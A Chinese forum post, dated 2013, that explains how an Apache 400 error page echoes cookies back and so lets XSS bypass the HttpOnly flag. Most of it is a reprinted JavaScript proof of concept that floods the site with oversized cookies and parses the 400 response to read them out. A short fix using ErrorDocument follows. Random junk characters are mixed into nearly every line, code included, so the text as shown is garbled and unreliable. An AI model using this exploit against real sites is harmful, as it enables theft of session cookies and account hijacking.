很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
5 R% V+ ~& |* g- _) R" n2 A% z( h: y1 @7 h
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
; ?7 b% d. O1 ]& @3 E: O0 p7 k 6 ~+ q2 F3 e1 |
3 _6 g3 h- |) @4 \& W+ ?9 v( c( N
// http://www.exploit-db.com/exploits/18442/+ _2 H7 P7 k! O L: U2 m4 s& B
function setCookies (good) {9 z4 o+ X# l" h% T7 j, b( z
// Construct string for cookie value
1 F# f) Y4 [9 |var str = "";* G9 m1 F8 J J. Q
for (var i=0; i< 819; i++) {" n+ z& _: K1 T4 s# Y
str += "x";. E L) ^ o8 }4 \) C. i5 [: N% n7 S
}- Z$ _( s' U, F" O+ w
// Set cookies5 @& J8 O5 R0 `4 i/ f5 l
for (i = 0; i < 10; i++) {
+ a7 l$ m' f/ ^# R& k// Expire evil cookie
' W7 n) x, G0 O! F' k" oif (good) {0 W9 k) S7 ~, Q* _/ B
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
. t% A4 C2 t! h4 v+ s: \( {0 {}* S1 g$ O2 s- ~ m3 J3 r
// Set evil cookie8 `6 Z. ?% v# E
else {, ~- n1 l) l0 Q( v' d
var cookie = "xss"+i+"="+str+";path=/";
4 e, O( \' y; d5 ^0 m5 ]} Z) n3 Y9 \' }6 Q1 {/ C
document.cookie = cookie;
0 A1 g9 Y9 Y. n}
5 J c' ^* j, m" U9 B}9 k9 E) n3 Y1 P: J0 i
function makeRequest() {
/ X' p$ J4 A y& WsetCookies();4 V- T0 Z5 k9 d/ H3 }, B W
function parseCookies () {
7 ~5 m* y* V; ~4 @# h* A% zvar cookie_dict = {};
& i& m1 Z6 C ]( o// Only react on 400 status; K# D6 k' R1 R, E v# o/ _
if (xhr.readyState === 4 && xhr.status === 400) {5 Q/ ^+ g7 @, r( j% G N$ w
// Replace newlines and match <pre> content
5 `( d2 w" T- c" `% U- }var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
4 j7 x9 ~' B5 L& eif (content.length) {
# I D! X0 x; S; i* ]0 g+ r// Remove Cookie: prefix
9 G* m5 o1 x4 l7 p+ c+ u Econtent = content[1].replace("Cookie: ", "");
1 {" U' t9 X5 u3 d3 Avar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
, O, @5 G0 A0 d2 b% q1 L4 E8 l2 X// Add cookies to object+ t B5 X @$ D! E+ X9 Z. I
for (var i=0; i<cookies.length; i++) {
+ r# w$ Z L7 t& Avar s_c = cookies.split('=',2);
* P2 q) m9 G/ H$ ccookie_dict[s_c[0]] = s_c[1];
% w: X2 ?; g( [/ d}
4 b9 _- ?( V2 u/ `! R6 _1 t} T8 Z. _- A6 D
// Unset malicious cookies
9 @* z2 j& c/ y2 A2 b: v' F! csetCookies(true);6 s. O, P4 Z/ f' j. N
alert(JSON.stringify(cookie_dict));% W! H/ i6 r( ?# o
}2 r( ^! F! o2 o. o; ~
}
- q8 s7 {# F0 K3 u0 o- R" i// Make XHR request
1 m; q7 F, I5 ^" x( P& Nvar xhr = new XMLHttpRequest();
# Y3 V' D4 e2 u" ^xhr.onreadystatechange = parseCookies;' l8 y3 D" ?9 k
xhr.open("GET", "/", true);
& q; @ Q) ]5 `) q4 O3 A2 l4 i# r1 [xhr.send(null);* b. t c1 E# X
}. f$ N+ D, h# r8 [4 c0 V
makeRequest();
7 C, w, g% T1 r+ U2 ]7 z: S3 e. ~
你就能看见华丽丽的400错误包含着cookie信息。
6 m0 M* w5 H3 t& C* ?- s2 W- V! [' D- b
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#: b1 h% X3 T0 x: ?2 K- u- T
/ }" P+ j- f" z+ w, [: k修复方案:+ x' ~% ]5 R" E# U4 ~: U7 P
' \( f7 R$ `5 YApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
8 i) d' s2 h& i: j% @) P
' M \& C7 b$ l/ H9 M2 u, N* }In the event of a problem or error, Apachecan be configured to do one of four things,
$ [7 ~6 C7 l' O( L$ L" V* q f( }+ o& X2 ^& `: e" ~
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息* O7 G$ M" J/ D- H0 U* Q
2. output acustomized message输出一段信息5 i. O+ Q+ W. Y, U. c
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 # C; j# \7 x- E- i: Y$ s; w# C
4. redirect to an external URL to handle theproblem/error转向一个外部URL# X$ G5 Y, ?0 C0 l3 [
$ d' f8 }( r: y8 D
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容9 m/ F2 @! J5 t2 b3 L
0 s, C4 x& i' Z+ o
Apache配置:5 x$ C7 M7 J0 g5 o
" L" n9 A1 q% |
ErrorDocument400 " security test"
- K. w) ^$ C* H& I' r/ J" J6 b( m3 E$ r! R% J6 ~, S! ~8 ~2 }" h# y9 q) n
当然,升级apache到最新也可:)。! x' q9 D, @0 E- V
c2 l: n. p: u& M+ `5 T( U4 h" I1 H参考:http://httpd.apache.org/security/vulnerabilities_22.html- U0 l, Q& D+ e8 H1 @
% i: s6 V) C+ w. H: B
|
发表于 2013-4-19 19:15:43
收藏
支持
反对